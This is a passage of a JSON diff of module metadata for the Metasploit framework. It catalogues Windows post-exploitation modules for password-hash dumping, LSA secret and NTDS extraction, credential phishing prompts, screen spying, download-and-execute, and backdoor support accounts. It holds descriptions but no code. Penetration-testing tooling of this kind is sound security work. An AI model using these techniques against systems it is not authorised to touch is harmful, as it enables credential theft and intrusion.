"/modules/post/windows/gather/forensics/recovery_files.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/recovery_files", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/get_bookmarks": { - "name": "Bookmarked Sites Retriever", - "fullname": "post/windows/gather/get_bookmarks", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "jerrelgordon" - ], - "description": "This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-11 14:29:36 +0000", - "path": "/modules/post/windows/gather/get_bookmarks.rb", - "is_install_path": true, - "ref_name": "windows/gather/get_bookmarks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/hashdump": { - "name": "Windows Gather Local User Account Password Hashes (Registry)", - "fullname": "post/windows/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module will dump the local user accounts from the SAM database using the registry", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/local_admin_search_enum": { - "name": "Windows Gather Local Admin Search", - "fullname": "post/windows/gather/local_admin_search_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon McCann \"zeknox\" ", - "Thomas McCarthy \"smilingraccoon\" ", - "Royce Davis \"r3dy\" " - ], - "description": "This module will identify systems in a given range that the\n supplied domain user (should migrate into a user pid) has administrative\n access to by using the Windows API OpenSCManagerA to establishing a handle\n to the remote host. Additionally it can enumerate logged in users and group\n membership via Windows API NetWkstaUserEnum and NetUserGetGroups.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/local_admin_search_enum.rb", - "is_install_path": true, - "ref_name": "windows/gather/local_admin_search_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/lsa_secrets": { - "name": "Windows Enumerate LSA Secrets", - "fullname": "post/windows/gather/lsa_secrets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Rob Bathurst " - ], - "description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt\n code from cachedump.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/lsa_secrets.rb", - "is_install_path": true, - "ref_name": "windows/gather/lsa_secrets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/make_csv_orgchart": { - "name": "Generate CSV Organizational Chart Data Using Manager Information", - "fullname": "post/windows/gather/make_csv_orgchart", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/make_csv_orgchart.rb", - "is_install_path": true, - "ref_name": "windows/gather/make_csv_orgchart", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/memory_dump": { - "name": "Windows Process Memory Dump", - "fullname": "post/windows/gather/memory_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "smashery" - ], - "description": "This module creates a memory dump of a process (to disk) and downloads the file\n for offline analysis.\n\n Options for DUMP_TYPE affect the completeness of the dump:\n\n \"full\" retrieves the entire process address space (all allocated pages);\n \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n well as memory mapped files. As a result, this option can be significantly\n smaller in size.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/memory_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/memory_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/memory_grep": { - "name": "Windows Gather Process Memory Grep", - "fullname": "post/windows/gather/memory_grep", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit " - ], - "description": "This module allows for searching the memory space of a process for potentially\n sensitive data. Please note: When the HEAP option is enabled, the module will have\n to migrate to the process you are grepping, and will not migrate back automatically.\n This means that if the user terminates the application after using this module, you\n may lose your session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/memory_grep.rb", - "is_install_path": true, - "ref_name": "windows/gather/memory_grep", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/netlm_downgrade": { - "name": "Windows NetLM Downgrade Attack", - "fullname": "post/windows/gather/netlm_downgrade", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon McCann \"zeknox\" ", - "Thomas McCarthy \"smilingraccoon\" " - ], - "description": "This module changes the system LmCompatibilityLevel registry value\n to enable sending LM challenge hashes and initiates a SMB connection\n to the host specified in the SMBHOST module option. If an SMB server\n is listening, it will receive the NetLM hashes for the session user.", - "references": [ - "URL-https://web.archive.org/web/20210311141729/https://www.optiv.com/explore-optiv-insights/blog/post-exploitation-using-netntlm-downgrade-attacks", - "URL-https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level", - "URL-https://support.microsoft.com/en-us/topic/security-guidance-for-ntlmv1-and-lm-network-authentication-da2168b6-4a31-0088-fb03-f081acde6e73" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-10-01 22:35:11 +0000", - "path": "/modules/post/windows/gather/netlm_downgrade.rb", - "is_install_path": true, - "ref_name": "windows/gather/netlm_downgrade", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/ntds_grabber": { - "name": "NTDS Grabber", - "fullname": "post/windows/gather/ntds_grabber", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe (koen.riepe " - ], - "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/ntds_grabber.rb", - "is_install_path": true, - "ref_name": "windows/gather/ntds_grabber", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/ntds_location": { - "name": "Post Windows Gather NTDS.DIT Location", - "fullname": "post/windows/gather/ntds_location", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will find the location of the NTDS.DIT file (from the Registry),\n check that it exists, and display its location on the screen, which is useful\n if you wish to manually acquire the file using ntdsutil or vss.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/ntds_location.rb", - "is_install_path": true, - "ref_name": "windows/gather/ntds_location", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/outlook": { - "name": "Windows Gather Outlook Email Messages", - "fullname": "post/windows/gather/outlook", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley Neelen " - ], - "description": "This module allows reading and searching email messages from the local\n Outlook installation using PowerShell. Please note that this module is\n manipulating the victims keyboard/mouse. If a victim is active on the target\n system, he may notice the activities of this module. Tested on Windows 8.1\n x64 with Office 2013.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/outlook.rb", - "is_install_path": true, - "ref_name": "windows/gather/outlook", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Lists all folders" - }, - { - "name": "SEARCH", - "description": "Searches for an email" - } - ] - }, - "post_windows/gather/phish_windows_credentials": { - "name": "Windows Gather User Credentials (phishing)", - "fullname": "post/windows/gather/phish_windows_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley Neelen ", - "Matt Nelson" - ], - "description": "This module is able to perform a phishing attack on the target by popping up a loginprompt.\n When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.\n The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/phish_windows_credentials.rb", - "is_install_path": true, - "ref_name": "windows/gather/phish_windows_credentials", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/psreadline_history": { - "name": "Windows Gather PSReadline History", - "fullname": "post/windows/gather/psreadline_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Garvit Dewan " - ], - "description": "Gathers Power Shell history data from the target machine.", - "references": [ - "URL-https://docs.microsoft.com/en-us/powershell/module/psreadline/", - "URL-https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py", - "URL-https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/psreadline_history.rb", - "is_install_path": true, - "ref_name": "windows/gather/psreadline_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/resolve_sid": { - "name": "Windows Gather Local User Account SID Lookup", - "fullname": "post/windows/gather/resolve_sid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "chao-mu" - ], - "description": "This module prints information about a given SID from the perspective\n of this session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/resolve_sid.rb", - "is_install_path": true, - "ref_name": "windows/gather/resolve_sid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/screen_spy": { - "name": "Windows Gather Screen Spy", - "fullname": "post/windows/gather/screen_spy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Roni Bachar ", - "bannedit ", - "kernelsmith ", - "Adrian Kubok", - "DLL_Cool_J" - ], - "description": "This module will incrementally take desktop screenshots from the host. This\n allows for screen spying which can be useful to determine if there is an active\n user on a machine, or to record the screen for later data extraction.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/screen_spy.rb", - "is_install_path": true, - "ref_name": "windows/gather/screen_spy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/smart_hashdump": { - "name": "Windows Gather Local and Domain Controller Account Password Hashes", - "fullname": "post/windows/gather/smart_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This will dump local accounts from the SAM Database. If the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/smart_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/smart_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/tcpnetstat": { - "name": "Windows Gather TCP Netstat", - "fullname": "post/windows/gather/tcpnetstat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module lists current TCP sessions.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/tcpnetstat.rb", - "is_install_path": true, - "ref_name": "windows/gather/tcpnetstat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/usb_history": { - "name": "Windows Gather USB Drive History", - "fullname": "post/windows/gather/usb_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "nebulus" - ], - "description": "This module will enumerate USB Drive history on a target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/usb_history.rb", - "is_install_path": true, - "ref_name": "windows/gather/usb_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/win_privs": { - "name": "Windows Gather Privileges Enumeration", - "fullname": "post/windows/gather/win_privs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Merlyn Cousins " - ], - "description": "This module will print if UAC is enabled, and if the current account is\n ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status\n and current process PRIVILEGES.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/win_privs.rb", - "is_install_path": true, - "ref_name": "windows/gather/win_privs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/wmic_command": { - "name": "Windows Gather Run WMIC Commands", - "fullname": "post/windows/gather/wmic_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module executes WMIC commands on the specified host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-23 00:25:13 +0000", - "path": "/modules/post/windows/gather/wmic_command.rb", - "is_install_path": true, - "ref_name": "windows/gather/wmic_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/word_unc_injector": { - "name": "Windows Gather Microsoft Office Word UNC Path Injector", - "fullname": "post/windows/gather/word_unc_injector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "SphaZ " - ], - "description": "This module modifies a remote .docx file that will, upon opening, submit\n stored netNTLM credentials to a remote host. Verified to work with Microsoft\n Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", - "references": [ - "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/word_unc_injector.rb", - "is_install_path": true, - "ref_name": "windows/gather/word_unc_injector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/add_user": { - "name": "Windows Manage Add User to the Domain and/or to a Domain Group", - "fullname": "post/windows/manage/add_user", - "aliases": [ - "post/windows/manage/add_user_domain" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": "This module adds a user to the Domain and/or to a Domain group. It will\n check if sufficient privileges are present for certain actions and run\n getprivs for system. If you elevated privs to system, the\n SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n a process that is running as system. If you don't have privs, this script\n exits.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/add_user.rb", - "is_install_path": true, - "ref_name": "windows/manage/add_user", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/archmigrate": { - "name": "Architecture Migrate", - "fullname": "post/windows/manage/archmigrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe (koen.riepe " - ], - "description": "This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a\n new process with the correct architecture and migrates into that process.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/archmigrate.rb", - "is_install_path": true, - "ref_name": "windows/manage/archmigrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/change_password": { - "name": "Windows Manage Change Password", - "fullname": "post/windows/manage/change_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will attempt to change the password of the targeted account.\n The typical usage is to change a newly created account's password on a\n remote host to avoid the error, 'System error 1907 has occurred,' which\n is caused when the account policy enforces a password change before the\n next login.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/change_password.rb", - "is_install_path": true, - "ref_name": "windows/manage/change_password", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/clone_proxy_settings": { - "name": "Windows Manage Proxy Setting Cloner", - "fullname": "post/windows/manage/clone_proxy_settings", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module copies the proxy settings from the current user to the\n targeted user SID, supports remote hosts as well if remote registry\n is allowed.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/windows/manage/clone_proxy_settings.rb", - "is_install_path": true, - "ref_name": "windows/manage/clone_proxy_settings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/delete_user": { - "name": "Windows Manage Local User Account Deletion", - "fullname": "post/windows/manage/delete_user", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "chao-mu" - ], - "description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/delete_user.rb", - "is_install_path": true, - "ref_name": "windows/manage/delete_user", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/dell_memory_protect": { - "name": "Dell DBUtilDrv2.sys Memory Protection Modifier", - "fullname": "post/windows/manage/dell_memory_protect", - "aliases": [], - "rank": 0, - "disclosure_date": null, - "type": "post", - "author": [ - "SentinelLabs", - "Kasif Dekel", - "Red Cursor", - "Jacob Baines" - ], - "description": "The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition\n that allows an attacker to read and write arbitrary kernel-mode memory. This module\n installs the provided driver, enables or disables LSA protection on the provided\n PID, and then removes the driver. This would allow, for example, dumping LSASS memory\n even when secureboot is enabled or preventing antivirus from accessing the memory of\n a chosen PID.\n\n The affected drivers are not distributed with Metasploit. You will truly need to\n Bring Your Own (Dell) Driver.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "URL-https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", - "URL-https://itm4n.github.io/lsass-runasppl/", - "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "URL-https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93", - "URL-https://github.com/RedCursorSecurityConsulting/PPLKiller", - "URL-https://github.com/jbaines-r7/dellicious" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/post/windows/manage/dell_memory_protect.rb", - "is_install_path": true, - "ref_name": "windows/manage/dell_memory_protect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-os-restarts" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/download_exec": { - "name": "Windows Manage Download and/or Execute", - "fullname": "post/windows/manage/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "RageLtMan " - ], - "description": "This module will download a file by importing urlmon via railgun.\n The user may also choose to execute the file with arguments via exec_string.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/download_exec.rb", - "is_install_path": true, - "ref_name": "windows/manage/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/driver_loader": { - "name": "Windows Manage Driver Loader", - "fullname": "post/windows/manage/driver_loader", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module loads a KMD (Kernel Mode Driver) using the Windows Service API.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/driver_loader.rb", - "is_install_path": true, - "ref_name": "windows/manage/driver_loader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-down" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/enable_rdp": { - "name": "Windows Manage Enable Remote Desktop", - "fullname": "post/windows/manage/enable_rdp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module enables the Remote Desktop Service (RDP). It provides the options to create\n an account and configure it to be a member of the Local Administrators and\n Remote Desktop Users group. It can also forward the target's port 3389/tcp.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/enable_rdp.rb", - "is_install_path": true, - "ref_name": "windows/manage/enable_rdp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/enable_support_account": { - "name": "Windows Manage Trojanize Support Account", - "fullname": "post/windows/manage/enable_support_account", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "salcho " - ], - "description": "This module enables alternative access to servers and workstations\n by modifying the support account's properties. It will enable\n the account for remote access as the administrator user while\n taking advantage of some weird behavior in lusrmgr.msc. It will\n check if sufficient privileges are available for registry operations,\n otherwise it exits.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/enable_support_account.rb", - "is_install_path": true, - "ref_name": "windows/manage/enable_support_account", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - 